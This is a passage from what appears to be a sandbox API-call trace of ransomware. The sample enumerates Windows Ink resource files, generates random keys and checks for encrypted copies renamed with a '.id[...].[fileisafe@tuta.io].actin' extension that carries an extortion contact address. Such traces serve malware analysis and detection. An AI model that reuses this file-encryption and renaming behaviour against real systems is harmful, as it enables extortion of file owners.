shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.570] SetEvent (hEvent=0x288) returned 1 [0146.570] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.570] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=48936) returned 1 [0146.570] CloseHandle (hObject=0x2e0) returned 1 [0146.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0146.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.571] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.571] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=46622) returned 1 [0146.572] CloseHandle (hObject=0x2e0) returned 1 [0146.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0146.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.572] SetEvent (hEvent=0x288) returned 1 [0146.572] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.572] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=84190) returned 1 [0146.572] CloseHandle (hObject=0x2e0) returned 1 [0146.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0146.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.573] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.573] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.573] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=180172) returned 1 [0146.573] CloseHandle (hObject=0x2e0) returned 1 [0146.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0146.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.573] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.573] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.573] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.573] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=208408) returned 1 [0146.573] CloseHandle (hObject=0x2e0) returned 1 [0146.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0146.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.574] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.575] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=8704) returned 1 [0146.575] CloseHandle (hObject=0x2e0) returned 1 [0146.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui")) returned 0x20 [0146.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.575] SetEvent (hEvent=0x288) returned 1 [0146.575] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.576] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=5120) returned 1 [0146.576] CloseHandle (hObject=0x2e0) returned 1 [0146.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui")) returned 0x20 [0146.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.577] SetEvent (hEvent=0x288) returned 1 [0146.577] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.577] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3072) returned 1 [0146.577] CloseHandle (hObject=0x2e0) returned 1 [0146.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui")) returned 0x20 [0146.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.578] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.578] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=23040) returned 1 [0146.578] CloseHandle (hObject=0x2e0) returned 1 [0146.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui")) returned 0x20 [0146.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.579] SetEvent (hEvent=0x288) returned 1 [0146.579] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.579] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2560) returned 1 [0146.580] CloseHandle (hObject=0x2e0) returned 1 [0146.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui")) returned 0x20 [0146.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.580] SetEvent (hEvent=0x288) returned 1 [0146.580] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.580] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=199994) returned 1 [0146.580] CloseHandle (hObject=0x2e0) returned 1 [0146.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0146.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.581] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.581] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9216) returned 1 [0146.581] CloseHandle (hObject=0x2e0) returned 1 [0146.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui")) returned 0x20 [0146.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.582] SetEvent (hEvent=0x288) returned 1 [0146.582] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.582] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.582] CloseHandle (hObject=0x2e0) returned 1 [0146.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui")) returned 0x20 [0146.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.583] SetEvent (hEvent=0x288) returned 1 [0146.583] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.584] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3072) returned 1 [0146.584] CloseHandle (hObject=0x2e0) returned 1 [0146.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui")) returned 0x20 [0146.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.584] SetEvent (hEvent=0x288) returned 1 [0146.584] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.585] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3072) returned 1 [0146.585] CloseHandle (hObject=0x2e0) returned 1 [0146.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui")) returned 0x20 [0146.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.585] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.585] SetEvent (hEvent=0x288) returned 1 [0146.585] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.585] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.586] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=44032) returned 1 [0146.586] CloseHandle (hObject=0x2e0) returned 1 [0146.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui")) returned 0x20 [0146.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.586] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.586] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.586] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common 